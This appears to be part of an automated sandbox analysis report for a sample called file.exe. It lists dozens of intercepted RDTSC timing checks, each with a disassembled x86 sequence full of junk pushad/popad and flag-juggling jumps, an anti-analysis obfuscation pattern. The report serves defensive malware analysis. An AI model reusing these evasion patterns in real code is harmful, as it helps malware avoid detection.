                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0B97 second address: 49F0BE1 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 26h 0x00000008 popad 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d mov ebx, 5EF7E50Eh 0x00000012 pushfd 0x00000013 jmp 00007F7E2CD3B83Fh 0x00000018 sbb eax, 60ADADBEh 0x0000001e jmp 00007F7E2CD3B849h 0x00000023 popfd 0x00000024 popad 0x00000025 push 00000001h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0BE1 second address: 49F0C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7E2CC83CA9h 0x0000000a sbb al, FFFFFFA6h 0x0000000d jmp 00007F7E2CC83CA1h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0C15 second address: 49F0C71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CD3B847h 0x00000009 sbb ax, DDDEh 0x0000000e jmp 00007F7E2CD3B849h 0x00000013 popfd 0x00000014 jmp 00007F7E2CD3B840h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov edi, 7C7AA7F0h 0x00000025 mov edi, 037A531Ch 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0C71 second address: 49F0D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 21CF1687h 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 mov eax, 2CBE9811h 0x00000016 movzx esi, bx 0x00000019 popad 0x0000001a pushad 0x0000001b mov dx, 8F7Ch 0x0000001f call 00007F7E2CC83CA5h 0x00000024 pop eax 0x00000025 popad 0x00000026 popad 0x00000027 nop 0x00000028 jmp 00007F7E2CC83CA7h 0x0000002d lea eax, dword ptr [ebp-08h] 0x00000030 pushad 0x00000031 pushad 0x00000032 movzx ecx, di 0x00000035 pushfd 0x00000036 jmp 00007F7E2CC83CA7h 0x0000003b or cl, FFFFFFBEh 0x0000003e jmp 00007F7E2CC83CA9h 0x00000043 popfd 0x00000044 popad 0x00000045 push esi 0x00000046 pop ecx 0x00000047 popad 0x00000048 push esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F7E2CC83CA5h 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D19 second address: 49F0D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7E2CD3B847h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D9B second address: 49F0D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0D9F second address: 49F0DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DA3 second address: 49F0DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DA9 second address: 49F0DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0DAE second address: 49F0E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 jmp 00007F7E2CC83CA6h 0x00000019 popad 0x0000001a mov dword ptr [esi+08h], eax 0x0000001d pushad 0x0000001e call 00007F7E2CC83C9Eh 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F7E2CC83CA7h 0x0000002a or ax, 83BEh 0x0000002f jmp 00007F7E2CC83CA9h 0x00000034 popfd 0x00000035 popad 0x00000036 lea eax, dword ptr [ebx+70h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F7E2CC83CA8h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E43 second address: 49F0E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0E52 second address: 49F0EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c mov cx, 8A63h 0x00000010 mov edi, eax 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F7E2CC83CA2h 0x00000019 push eax 0x0000001a jmp 00007F7E2CC83C9Bh 0x0000001f nop 0x00000020 jmp 00007F7E2CC83CA6h 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 pushad 0x00000029 mov edi, ecx 0x0000002b jmp 00007F7E2CC83C9Ah 0x00000030 popad 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0EC7 second address: 49F0ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ECB second address: 49F0ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ECF second address: 49F0ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0ED5 second address: 49F0EDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0F75 second address: 49F0FF9 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 js 00007F7E9DC79F68h 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7E2CD3B844h 0x00000019 adc cx, 4948h 0x0000001e jmp 00007F7E2CD3B83Bh 0x00000023 popfd 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 popad 0x00000028 mov eax, dword ptr [ebp-14h] 0x0000002b pushad 0x0000002c call 00007F7E2CD3B842h 0x00000031 movzx esi, dx 0x00000034 pop ebx 0x00000035 movzx eax, dx 0x00000038 popad 0x00000039 mov ecx, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F7E2CD3B840h 0x00000044 or ah, 00000008h 0x00000047 jmp 00007F7E2CD3B83Bh 0x0000004c popfd 0x0000004d mov bx, cx 0x00000050 popad 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F0FF9 second address: 49F1031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E2CC83CA8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1031 second address: 49F1040 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1040 second address: 49F1058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1058 second address: 49F1113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, 759B06ECh 0x0000000d jmp 00007F7E2CD3B847h 0x00000012 sub eax, eax 0x00000014 pushad 0x00000015 movsx edi, cx 0x00000018 pushfd 0x00000019 jmp 00007F7E2CD3B83Eh 0x0000001e sbb ax, 82B8h 0x00000023 jmp 00007F7E2CD3B83Bh 0x00000028 popfd 0x00000029 popad 0x0000002a lock cmpxchg dword ptr [edx], ecx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F7E2CD3B844h 0x00000035 and cx, BD18h 0x0000003a jmp 00007F7E2CD3B83Bh 0x0000003f popfd 0x00000040 jmp 00007F7E2CD3B848h 0x00000045 popad 0x00000046 pop edi 0x00000047 jmp 00007F7E2CD3B840h 0x0000004c test eax, eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F7E2CD3B847h 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1113 second address: 49F113D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F7E9DBC2242h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F113D second address: 49F1174 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov ebx, 0F0969FEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov edx, dword ptr [ebp+08h] 0x00000011 jmp 00007F7E2CD3B845h 0x00000016 mov eax, dword ptr [esi] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7E2CD3B83Dh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1174 second address: 49F11CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop edi 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F7E2CC83CA9h 0x00000022 adc eax, 608C2EF6h 0x00000028 jmp 00007F7E2CC83CA1h 0x0000002d popfd 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F11CE second address: 49F11D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F11D2 second address: 49F125F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7E2CC83C9Eh 0x0000000c or cx, 5018h 0x00000011 jmp 00007F7E2CC83C9Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [edx+04h], eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F7E2CC83CA4h 0x00000022 add cl, 00000078h 0x00000025 jmp 00007F7E2CC83C9Bh 0x0000002a popfd 0x0000002b mov ah, 2Dh 0x0000002d popad 0x0000002e mov eax, dword ptr [esi+08h] 0x00000031 pushad 0x00000032 mov di, 4054h 0x00000036 mov eax, ebx 0x00000038 popad 0x00000039 mov dword ptr [edx+08h], eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F7E2CC83CA0h 0x00000045 jmp 00007F7E2CC83CA5h 0x0000004a popfd 0x0000004b mov dh, ch 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F125F second address: 49F12B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 call 00007F7E2CD3B845h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+0Ch] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F7E2CD3B83Dh 0x00000018 sbb ecx, 26F49086h 0x0000001e jmp 00007F7E2CD3B841h 0x00000023 popfd 0x00000024 mov si, 5637h 0x00000028 popad 0x00000029 mov dword ptr [edx+0Ch], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f mov ebx, 5F98661Ah 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F12B8 second address: 49F1356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, A7h 0x00000005 mov bl, cl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d pushad 0x0000000e mov di, 8822h 0x00000012 mov edi, 7261046Eh 0x00000017 popad 0x00000018 mov dword ptr [edx+10h], eax 0x0000001b pushad 0x0000001c mov di, 3346h 0x00000020 pushad 0x00000021 mov dx, C5A0h 0x00000025 pushfd 0x00000026 jmp 00007F7E2CC83CA9h 0x0000002b or si, CCA6h 0x00000030 jmp 00007F7E2CC83CA1h 0x00000035 popfd 0x00000036 popad 0x00000037 popad 0x00000038 mov eax, dword ptr [esi+14h] 0x0000003b jmp 00007F7E2CC83C9Eh 0x00000040 mov dword ptr [edx+14h], eax 0x00000043 jmp 00007F7E2CC83CA0h 0x00000048 mov eax, dword ptr [esi+18h] 0x0000004b pushad 0x0000004c call 00007F7E2CC83C9Eh 0x00000051 mov bx, cx 0x00000054 pop esi 0x00000055 mov ch, dl 0x00000057 popad 0x00000058 mov dword ptr [edx+18h], eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1356 second address: 49F135A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F135A second address: 49F1360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1360 second address: 49F137F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7E2CD3B83Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F137F second address: 49F138E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F138E second address: 49F1394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1394 second address: 49F1398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1398 second address: 49F13CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+1Ch], eax 0x0000000e jmp 00007F7E2CD3B846h 0x00000013 mov eax, dword ptr [esi+20h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F13CB second address: 49F13D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F13D1 second address: 49F13E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F13E0 second address: 49F141E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CC83CA8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F141E second address: 49F1422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1422 second address: 49F1428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1428 second address: 49F1439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1439 second address: 49F149C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+24h] 0x0000000e pushad 0x0000000f mov bh, cl 0x00000011 mov ebx, 7ED3DF5Ch 0x00000016 popad 0x00000017 mov dword ptr [edx+24h], eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7E2CC83CA1h 0x00000021 or eax, 2EA457B6h 0x00000027 jmp 00007F7E2CC83CA1h 0x0000002c popfd 0x0000002d call 00007F7E2CC83CA0h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F149C second address: 49F14F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+28h] 0x00000009 pushad 0x0000000a mov al, dl 0x0000000c mov ecx, 406D6C25h 0x00000011 popad 0x00000012 mov dword ptr [edx+28h], eax 0x00000015 jmp 00007F7E2CD3B840h 0x0000001a mov ecx, dword ptr [esi+2Ch] 0x0000001d jmp 00007F7E2CD3B840h 0x00000022 mov dword ptr [edx+2Ch], ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F7E2CD3B847h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F14F0 second address: 49F1508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1508 second address: 49F1589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+30h] 0x0000000c jmp 00007F7E2CD3B847h 0x00000011 mov word ptr [edx+30h], ax 0x00000015 jmp 00007F7E2CD3B846h 0x0000001a mov ax, word ptr [esi+32h] 0x0000001e jmp 00007F7E2CD3B840h 0x00000023 mov word ptr [edx+32h], ax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F7E2CD3B83Dh 0x00000030 xor esi, 048EE2A6h 0x00000036 jmp 00007F7E2CD3B841h 0x0000003b popfd 0x0000003c mov edi, esi 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1589 second address: 49F15A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F15A5 second address: 49F15F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b pushad 0x0000000c jmp 00007F7E2CD3B83Dh 0x00000011 mov ax, B0A7h 0x00000015 popad 0x00000016 mov dword ptr [edx+34h], eax 0x00000019 jmp 00007F7E2CD3B83Ah 0x0000001e test ecx, 00000700h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007F7E2CD3B848h 0x0000002c pop esi 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F15F3 second address: 49F163E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7E2CC83C9Eh 0x00000009 and si, BF68h 0x0000000e jmp 00007F7E2CC83C9Bh 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jne 00007F7E9DBC1D92h 0x0000001f jmp 00007F7E2CC83CA4h 0x00000024 or dword ptr [edx+38h], FFFFFFFFh 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push edx 0x0000002c pop esi 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F163E second address: 49F168F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7E2CD3B83Fh 0x00000008 sub si, 680Eh 0x0000000d jmp 00007F7E2CD3B849h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000001a jmp 00007F7E2CD3B83Eh 0x0000001f or dword ptr [edx+40h], FFFFFFFFh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov si, bx 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F168F second address: 49F1695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1695 second address: 49F1699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1699 second address: 49F16EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7E2CC83CA9h 0x00000010 sbb ax, 8C56h 0x00000015 jmp 00007F7E2CC83CA1h 0x0000001a popfd 0x0000001b mov ebx, ecx 0x0000001d popad 0x0000001e pop ebx 0x0000001f pushad 0x00000020 mov esi, 33AE52BFh 0x00000025 mov edi, esi 0x00000027 popad 0x00000028 leave 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx ebx, ax 0x0000002f mov eax, 584AF1CBh 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0965 second address: 49E0969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0969 second address: 49E096F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E096F second address: 49E0975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0975 second address: 49E0979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CDB second address: 49C0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CE1 second address: 49C0CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CE5 second address: 49C0D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop ecx 0x0000000e pushfd 0x0000000f jmp 00007F7E2CD3B847h 0x00000014 add al, FFFFFFAEh 0x00000017 jmp 00007F7E2CD3B849h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0D29 second address: 49C0D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7E2CC83CA7h 0x00000008 call 00007F7E2CC83CA8h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F7E2CC83C9Dh 0x0000001b sub esi, 7AF803F6h 0x00000021 jmp 00007F7E2CC83CA1h 0x00000026 popfd 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E088D second address: 49E0891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0891 second address: 49E0897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0064F second address: 4A00655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00655 second address: 4A00670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CC83CA7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00670 second address: 4A0069D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B849h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, 143Eh 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 rdtsc
